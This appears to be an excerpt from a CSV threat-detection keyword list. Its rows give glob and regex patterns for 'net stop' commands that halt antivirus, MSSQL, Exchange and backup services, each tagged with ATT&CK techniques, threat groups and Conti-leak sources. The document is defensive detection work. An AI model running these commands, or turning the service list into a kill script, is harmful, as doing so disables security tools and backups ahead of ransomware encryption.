"*net stop mfefire*",".{0,1000}net\sstop\smfefire.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop mfemms*",".{0,1000}net\sstop\smfemms.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop mfevtp*",".{0,1000}net\sstop\smfevtp.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop mozyprobackup*",".{0,1000}net\sstop\smozyprobackup.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop mr2kserv*",".{0,1000}net\sstop\smr2kserv.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop MsDtsServer*",".{0,1000}net\sstop\sMsDtsServer.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MsDtsServer100*",".{0,1000}net\sstop\sMsDtsServer100.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MsDtsServer110*",".{0,1000}net\sstop\sMsDtsServer110.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSExchangeADTopology*",".{0,1000}net\sstop\sMSExchangeADTopology.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop MSExchangeFBA*",".{0,1000}net\sstop\sMSExchangeFBA.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop MSExchangeIS*",".{0,1000}net\sstop\sMSExchangeIS.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop MSExchangeSA*",".{0,1000}net\sstop\sMSExchangeSA.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop msftesql$PROD*",".{0,1000}net\sstop\smsftesql\$PROD.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSOLAP$SQL_2008*",".{0,1000}net\sstop\sMSOLAP\$SQL_2008.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSOLAP$SYSTEM_BGC*",".{0,1000}net\sstop\sMSOLAP\$SYSTEM_BGC.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSOLAP$TPS*",".{0,1000}net\sstop\sMSOLAP\$TPS.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSOLAP$TPSAMA*",".{0,1000}net\sstop\sMSOLAP\$TPSAMA.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSSQL$BKUPEXEC*",".{0,1000}net\sstop\sMSSQL\$BKUPEXEC.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSSQL$CONTOSO1*",".{0,1000}net\sstop\sMSSQL\$CONTOSO1.{0,1000}","greyware_tool_keyword","net","VoidCrypt ransomware","T1486 - T1490","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","N/A","10","3","294","43","2024-08-30T12:07:16Z","2021-07-28T21:00:52Z"
"*net stop MSSQL$ECWDB2*",".{0,1000}net\sstop\sMSSQL\$ECWDB2.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSSQL$ISARS*",".{0,1000}net\sstop\sMSSQL\$ISARS.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop MSSQL$MSFW*",".{0,1000}net\sstop\sMSSQL\$MSFW.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop MSSQL$PRACTICEMGT*",".{0,1000}net\sstop\sMSSQL\$PRACTICEMGT.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSSQL$PRACTTICEBGC*",".{0,1000}net\sstop\sMSSQL\$PRACTTICEBGC.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSSQL$PROD*",".{0,1000}net\sstop\sMSSQL\$PROD.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSSQL$PROFXENGAGEMENT*",".{0,1000}net\sstop\sMSSQL\$PROFXENGAGEMENT.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSSQL$SBSMONITORING*",".{0,1000}net\sstop\sMSSQL\$SBSMONITORING.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSSQL$SHAREPOINT*",".{0,1000}net\sstop\sMSSQL\$SHAREPOINT.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSSQL$SOPHOS*",".{0,1000}net\sstop\sMSSQL\$SOPHOS.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSSQL$SQL_2008*",".{0,1000}net\sstop\sMSSQL\$SQL_2008.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSSQL$SQLEXPRESS*",".{0,1000}net\sstop\sMSSQL\$SQLEXPRESS.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSSQL$SYSTEM_BGC*",".{0,1000}net\sstop\sMSSQL\$SYSTEM_BGC.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSSQL$TPS*",".{0,1000}net\sstop\sMSSQL\$TPS.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSSQL$TPSAMA*",".{0,1000}net\sstop\sMSSQL\$TPSAMA.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSSQL$VEEAMSQL*",".{0,1000}net\sstop\sMSSQL\$VEEAMSQL.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSSQL$VEEAMSQL*",".{0,1000}net\sstop\sMSSQL\$VEEAMSQL.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MSSQLServerADHelper100*",".{0,1000}net\sstop\sMSSQLServerADHelper100.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
